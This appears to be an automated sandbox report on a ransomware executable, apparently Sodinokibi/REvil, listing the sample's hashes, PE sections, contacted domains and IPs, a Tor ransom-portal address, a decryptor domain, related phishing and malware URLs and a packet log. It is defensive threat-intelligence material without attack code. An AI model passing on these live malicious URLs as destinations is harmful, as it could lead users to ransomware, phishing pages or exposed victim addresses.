http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606	RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.dr	true	Avira URL Cloud: malware	unknown
http://brownswoodblog.com/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avtoboss163.ru:443/static/assets/hbhezx.pngources	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rarefoods.ro/admin/pics/wcyshd.png	RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/	RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://brownswoodblog.com/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rarefoods.ro/admin/pics/wcyshd.png1	RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://so-sage.fr/Y	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avtoboss163.ru/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://patriotcleaning.net/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rarefoods.ro/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://patriotcleaning.net/W	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://decryptor.top/	RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://so-sage.fr:443/news/game/bvprbb.pngt	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
137.74.231.3	so-sage.fr	France	16276	OVHFR	true
172.67.219.93	brownswoodblog.com	United States	13335	CLOUDFLARENETUS	true
138.197.111.104	patriotcleaning.net	United States	14061	DIGITALOCEAN-ASNUS	true
185.32.57.142	avtoboss163.ru	Russian Federation	60357	MEGAGROUP-ASRU	true
172.67.132.175	p-ride.live	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1343919
Start date and time:	2023-11-17 00:49:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	RQzHm5vLxs.exe renamed because original name is a hash value
Original Sample Name:	17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/211@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: RQzHm5vLxs.exe

Simulations

Behavior and APIs

Time	Type	Description
00:51:58	API Interceptor	3x Sleep call for process: RQzHm5vLxs.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
avtoboss163.ru	Strong.exe	Get hash	malicious	Unknown	Browse	37.140.192.212
so-sage.fr	script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe	Get hash	malicious	HTMLPhisher Sodinokibi	Browse	217.182.126.186
patriotcleaning.net	script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe	Get hash	malicious	HTMLPhisher Sodinokibi	Browse	172.67.142.212
p-ride.live	script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe	Get hash	malicious	HTMLPhisher Sodinokibi	Browse	104.28.13.75
	#Uc9c0#Ubd88#Uc744#Uc704#Ud55c #Uc1a1#Uc7a5.docx.exe	Get hash	malicious		Browse	104.28.13.75
	#Uc0ac#Uac74#Uc5d0 #Uad00#Ud55c #Uc11c#Ub958 SBL4990193.doc.exe	Get hash	malicious		Browse	104.28.12.75
	#Uc18c#Ud3ec #Uc120#Uc5b8.doc.exe	Get hash	malicious		Browse	104.28.12.75
	#Uc0ac#Uac74#Uc5d0 #Uad00#Ud55c #Uc11c#Ub958.doc.exe	Get hash	malicious		Browse	104.28.12.75
	#Ubc95#Uc6d0 #Uc11c#Ub958.doc.exe	Get hash	malicious		Browse	104.28.12.75
brownswoodblog.com	28112019_2019-11-28_04-06.exe	Get hash	malicious	Sodinokibi	Browse	104.18.61.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	ywkyQKUlD3.exe	Get hash	malicious	Sodinokibi	Browse	91.121.55.191
	jXz2ukrd2P.exe	Get hash	malicious	Sodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansom	Browse	145.239.37.162
	a0QFYpDZZz.exe	Get hash	malicious	Sodinokibi	Browse	51.75.34.224
	PGeBff2Pio.exe	Get hash	malicious	Sodinokibi, TrojanRansom	Browse	213.186.33.2
	GoogleCrashHandler64.exe	Get hash	malicious	Nanominer, Xmrig	Browse	149.56.14.135
	GoogleCrashHandler64.exe	Get hash	malicious	Nanominer, Xmrig	Browse	149.56.14.135
	https://sender18.zohoinsights.com/ck1/2d6f.327230a/cf8e8100-6f25-11ee-bf15-525400d4bb1c/f560b8174e6aef5ec61aaea6055fec0786db99c7/2?e=BwZ7shaMYcEgQVNqqnLBVMSwuQWr5SU%2BDbOCYLSVGg8I%2Boc1UGTJ5hVGXtuX2BimpAZRRe9py3fpRywSthIGtW5mNdEZxNkpJh%2FcBXtOrU4%3D	Get hash	malicious	HTMLPhisher	Browse	147.135.65.48
	https://fpso-yfb3p.ondigitalocean.app/rkEX0win0x0786x0999xrkhkxpErr999x/index.php?click_id=611h5axzlp1fwctf&clickid=68ef85ae89b43fdcef0a32b9b672626f&phone=+1-833-741-5228&rezp=611h5axzlp1fwctf-tncle.com-658#	Get hash	malicious	TechSupportScam	Browse	147.135.36.89
	Docxc-xerox-Printinvoice.exe	Get hash	malicious	FormBook	Browse	51.91.236.193
	http://moreaboutadvertising.com	Get hash	malicious	HTMLPhisher	Browse	51.79.154.9
	http://103.30.76.56:8000	Get hash	malicious	GhostRat, Quasar	Browse	147.135.36.89
	chromebypass.exe	Get hash	malicious	Unknown	Browse	51.38.43.18
	chromebypass.exe	Get hash	malicious	Unknown	Browse	151.80.29.83
	https://goo.gl/TZiMbB	Get hash	malicious	Unknown	Browse	158.69.126.131
	cRmu9LROM09hq1F.exe	Get hash	malicious	FormBook	Browse	94.23.162.163
	https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LRgb7EaJr&clk=https%3A%2F%2Fbaidu.com/link?url=M_paI8wUUhyFFyYOfkv0BtRO2tYeocT9NZ8JuKTMQbfhljTSzkN9oa0taRuW8_fW&wd#.ZGlyay5kb25hdGhAYWltYXJhY2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse	51.77.72.43
	https://notifications.google.com/g/p/ANiao5payiDhby3DdHXSQnQRwGSpgKQ0j9dROs0QlcFlm0d0VmhhiNMPZfqA3_67fHWGx3REj-I8KTCJbuqv4c7p1ksWFWM6Vvj06JWsD08fCl1W3Mwkj9n3E8Z8xWeSpPUlPnLJArfStcDbjno6CP9gfqatlD1rR7FCVMbx6LgLy0rSSY3regFXBlhdHFiB08YpFxqnuqa6YyEd1OutuSMCcmmTgsXdvnxrgVqGsM6_cnva	Get hash	malicious	Unknown	Browse	5.135.113.252
	SecuriteInfo.com.Win32.RATX-gen.5138.32043.exe	Get hash	malicious	FormBook	Browse	51.91.236.193
	https://buildsend.com/ws/1.0/viewimage.aspx?c=bs3bElnjM35cIuYS0jC44KF5xlV9G0&i=337660&ct=application/url&f=People%20who%20test%20positive%20or%20were%20exposed&url=https://esquadriascanaa.com.br/unsubscribe/EQJgP/%23a2V2aW4uai5tdXJwaHlAZmFhLmdvdg0=	Get hash	malicious	HTMLPhisher	Browse	142.44.136.72
	Vl2iPhZcp2.exe	Get hash	malicious	Socks5Systemz, Xmrig	Browse	94.23.58.173
CLOUDFLARENETUS	ywkyQKUlD3.exe	Get hash	malicious	Sodinokibi	Browse	104.21.10.96
	jXz2ukrd2P.exe	Get hash	malicious	Sodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansom	Browse	104.18.24.153
	https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jk82-6qcW5BW0B06lZ3pcW2LlW8x52qpw6W5Wx65h9j0zP3W2Dkp9L974ZRlVlx_ls6lw_B2W68pJ0z3nckpfW5F6slJ5M46v1V8L_sB3S1p8dW2_RD1L7XQCWyV-sBK09kjLK7W3Cy0Gm8dxzMlW2ytD1y13XKKTN8LXsKWV87__W5KsfjT6-q43pW8WQHh36F0cwdW21-znT2zQyVtW3bw_9X7LQvkjW7hqsLy2wx0xKMbg3z4vN923f4g4c4x04	Get hash	malicious	Unknown	Browse	104.17.3.184
	PGeBff2Pio.exe	Get hash	malicious	Sodinokibi, TrojanRansom	Browse	172.66.42.253
	https://download.createmygif.com/CreateMyGif.exe	Get hash	malicious	Unknown	Browse	104.21.35.243
	https://t.sidekickopen10.com/Ctc/2P+23284/d5d06204/Jks2-6qcW69sMD-6lZ3pfW81T3026frHLKN3pc9_DylPGMW7VG_nc45dZPkW1wHnpj77TmgMW6TLF789bgV_BW7pFxq865QbQXW1rgLS297qdz8W4y62HK44z3X5W2C--f_779BRpW6hB_XP851xXbW8bb1Vs6FGQF-W59VfSD8P03_mW15f5BW71P68zW5gKfyb82nWpDW96V4-x59mDgFW8KzFx314ZddpW4n4PJ57FHD1qV--9kn2hqfbKW5B_N1Y5HwpvFVgp9P51jNmDsf1t5Kwg04	Get hash	malicious	Unknown	Browse	172.64.148.115
	https://officewebservicesggns2rl54t9zsqge961yjr3td.s3.us-east-2.amazonaws.com/preload-reCaptcha.html	Get hash	malicious	Fake Captcha	Browse	1.1.1.1
	https://strava.app.link/38598S3p?%243p=e_et&%24original_url=https%3A%2F%2Fbaidu.com///link?url=neMQr9azEt--a_UsVGmVNYkDEUPjN_x4zDzsSLNy7lC&wd#.ZXR1emFpdGVAYmlvbGVnZW5kLmNvbQ==	Get hash	malicious	Fake Captcha	Browse	1.1.1.1
	https://live.easygenerator.com/review/course/de4dcde8-435a-481e-8b8b-16f027088173/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bergson-law-1322273052.cos.ap-tokyo.myqcloud.com/bergson-law.html?e=#james_karban@baylor.edu	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jks2-6qcW69sMD-6lZ3pdVqXs5S548jDfW5VH1NJ1QwD76VGrtks8BwRn8W8FnB6d8NkwVfW4j3JGh8045H6W4GYwd18pPq1NN5ZBYHvQ_WNcW3fGfyj2lmz46N5v0lq77gNKcVLRpGH342kvPW9drsJ-4MsGWYW75Tkgd7hRCBrW8QF09_7vhN4bW2WXfBr3_LDBMW9b98nc9jj_qDW2FcQVv80nxSxMwvmt5trGxJW33v3Z38HTfP8W12YN1F7PR9fdW6KqpFK4fKc4vf245nHC04	Get hash	malicious	Unknown	Browse	104.21.65.135
	https://proxedge-my.sharepoint.com/:b:/g/personal/yukthi_proxedge_com1/ESUjydyHqxFJqRgYqxp9DAwB01AxpQpskY1Ia7AcE7IwNw?e=XHJUsf	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://seminovos.com.br/noticias/wp-includes/blocks/column/sm13/n.php?id=n064r50n	Get hash	malicious	HTMLPhisher	Browse	104.16.57.101
	https://download.pdfconvertercompare.com/PdfConverters.exe	Get hash	malicious	Unknown	Browse	104.26.1.18
	https://www.canva.com/design/DAF0Wahc1no/zsZFCDeauTqC5DJYw7dI9w/view?utm_content=DAF0Wahc1no&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://t.sidekickopen10.com/Ctc/2P+23284/d5d6-w04/JkM2-6qcW6N1vHY6lZ3nKW8wJljK7cvX5TW4-QBtM2J7hhlW2XhyKc75t6-JW82tj6d5jw9tzW94xXFv3tMhffW7WqP2M7bCGBqW52T22n117gCvN4c0HVbJ_mc8W80J-Sg5SsD--N6bSj02q_FdtW6BmYbL37lgXnW65WK4m7Bdq8GW66HBVb2dCCwLW64jK1J6lP2PkV1WmXg13XsrYW1F-9t_3mTDJNN166WjShRlGXW555ffF681-YrMZRpB_lHXCYW57gWSl6dwgM2W51Q9vV4W-1dvW3cZ2w04Tm1Rrf4bvVVP04	Get hash	malicious	Unknown	Browse	172.67.216.69
	http://go.nypost.com/	Get hash	malicious	Unknown	Browse	162.247.243.29
	https://monydine.co/category/work/index.html	Get hash	malicious	Unknown	Browse	104.26.0.122
	https://t.sidekickopen10.com/Ctc/2P+23284/d5d6Ks04/Jks2-6qcW69sMD-6lZ3pdVqXs5S548jDfW5VH1NJ1QwD76VGrtks8BwRn8W8FnB6d8NkwVfW4j3JGh8045H6W4GYwd18pPq1NN5ZBYHvQ_WNcW3fGfyj2lmz46N5v0lq77gNKcVLRpGH342kvPW9drsJ-4MsGWYW75Tkgd7hRCBrW8QF09_7vhN4bW2WXfBr3_LDBMW9b98nc9jj_qDW2FcQVv80nxSxMwvmt5trGxJW33v3Z38HTfP8W12YN1F7PR9fdW6KqpFK4fKc4vf245nHC04	Get hash	malicious	Unknown	Browse	104.21.65.135
	https://live.easygenerator.com/review/course/de4dcde8-435a-481e-8b8b-16f027088173/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ywkyQKUlD3.exe	Get hash	malicious	Sodinokibi	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	jXz2ukrd2P.exe	Get hash	malicious	Sodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansom	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	a0QFYpDZZz.exe	Get hash	malicious	Sodinokibi	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	PGeBff2Pio.exe	Get hash	malicious	Sodinokibi, TrojanRansom	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	Viacore Statement.xlsm	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	http://KANNADADJMIX.COM	Get hash	malicious	HTMLPhisher	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	HOERBIGER_Adressen 2.HJ_2023.xlsx	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	HOERBIGER-Beitr#U00e4ge-2HJ 2023.xlsx	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1za6WMBB-L6o_y_wwX3bE6YQ7ktf3L-iZ	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	file.exe	Get hash	malicious	RisePro Stealer	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	exploreRemote_alphav4.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	Systembackup.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	monscan.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	Computo.xlsx	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	PM237001-MSE-FI3-00012.xlsm	Get hash	malicious	Unknown	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	Watchercli.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	tsnsign.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	securitydriver_debug.exe	Get hash	malicious	Remcos	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	2yhQN6We8o.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142
	zOeRrMc7e1.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer	Browse	137.74.231.3 172.67.219.93 172.67.132.175 138.197.111.104 185.32.57.142

Process:	C:\Users\user\Desktop\RQzHm5vLxs.exe
File Type:	data
Category:	dropped
Size (bytes):	20704
Entropy (8bit):	7.98948247213665
Encrypted:	false
SSDEEP:	384:sZ4DQyr2GPkZMTk8JltBAcCJByblkvPhRShUSSg+7/r5Giovi+egHR9:sZYV4Zx+AcCTM+PhshUSS7/9GiiXD
MD5:	E6D89F490EF16D04E1BC044E35D0A223
SHA1:	4D14F7B80D5C0ED28B7E143E658BFCDC47713DD0
SHA-256:	50D3E3DF3DEE66225FFC791FBD8763BC8E4D0B4AD33380746CA6DB37B6485FEF
SHA-512:	5A468ED7C6DED6A628E1C9E4E2F485632FFD2EA001D5D9824A4C37E6A105051A466B5B781AEBEB078C33126F04DE13F7FBFDA636849B31A9018763BF03F1A2AF
Malicious:	false
Reputation:	low
Preview:	.+...W..gq..;......f...3Pi\|b"LV.;....A.3+...<..Q^...Q._`.# .s..&9...JJ.l.....&.#..f...gxv]..L...J...}...]X.....c...M..T.7....Op.^..%..u..tU...........VO......G71..........p.R..).....6...0Er.+.?5}...}1.....c...L.5..6'...9....i?y.F....n.8Ty..J..2L.cy.9..U.sV...l..}6....sH(A..Ac...8........./o.....!....[..Q...<d.C......C...isa.3.H-.-...s.]...".."_...*.;.[...3a.nQ.b...!.A...FD....'8"J..WIX..3..f..@o$".&... .;.kj.o..Zs..H-..^M......pp.61.V.......0.E.1.........-..x....o<.dAc..A9P...@..zLl..........@.:"..u..&..].C....3U..)m~K.P...!`9...\|.....A........4..".t....O.<.A......s....+...3V...?BuD...$.>....5$....?...d.{.r.......c...8U....bP]^;$p....{..W.s.'...[..=e[....2jsi....r.l...mY....0rZ..U...D-..jO.:J.{....q..e..M.\...<o.2(..'n.xo(....Xl..X....tv.. f.e{....<_...>......e./.u.=..t..!...l3.$k..:.Iz...'..X..].....v....],vZ..a.....B........8........B.-q.a.P....F.3b.{.z.".".........:E.{.^.zYU...~}.p...YNQ..........Dfw.F...........`..'.l

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.232263954573744
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RQzHm5vLxs.exe
File size:	167'936 bytes
MD5:	ca337c7130eef4f4ff8e8a4a8ec28647
SHA1:	28558e35d3f9af01fe438eba7fba1c38201c86de
SHA256:	17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467
SHA512:	60b9b7841a942a6bcb700872b6ff1353fd282a7b318d6ac8d47e419573978aff43c961436a2fdb6a076e81545ef9759e7848fdc9eaa5a571638ab19d666a1c1c
SSDEEP:	3072:LBVn11HzIOLbi4eTMlwDCnun4XbZIt+ypUF:d9jzvbnWJnu14p
TLSH:	BEF3BF162D9001F3C9A742F1562B3FA7D2FEB978231915DF9350C8845E335D2BA2B62B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{i..{i..{i..%l..{i..%j..{i."%m..{i."%k..{i.Rich.{i.........................PE..L...ob.\.............................5.....

Entrypoint:	0x4035fd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x5CF5626F [Mon Jun 3 18:09:51 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b000	0x53c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa1e4	0xa200	False	0.5746045524691358	data	6.579593961840767	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0xf650	0xf800	False	0.5038117439516129	data	6.4402375831504814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x17dc	0x1600	False	0.947265625	data	7.744002865043877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yesewt	0x1e000	0xc800	0xc800	False	0.5180859375	data	5.095979651283738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x2b000	0x53c	0x600	False	0.7858072916666666	data	6.183703203858595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2023 00:51:25.121834040 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.121916056 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:25.122133970 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.127418995 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.127441883 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:25.460278034 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:25.460383892 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.462259054 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.462274075 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:25.462579966 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:25.502906084 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.552175999 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.552201986 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:25.552217960 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:56.761039972 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:56.761110067 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:56.761215925 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:56.866341114 CET	49735	443	192.168.2.4	172.67.132.175
Nov 17, 2023 00:51:56.866372108 CET	443	49735	172.67.132.175	192.168.2.4
Nov 17, 2023 00:51:57.461164951 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:57.461199045 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:57.461261988 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:57.461854935 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:57.461867094 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.141674042 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.141768932 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:58.143593073 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:58.143609047 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.143938065 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.145201921 CET	49736	443	192.168.2.4	185.32.57.142
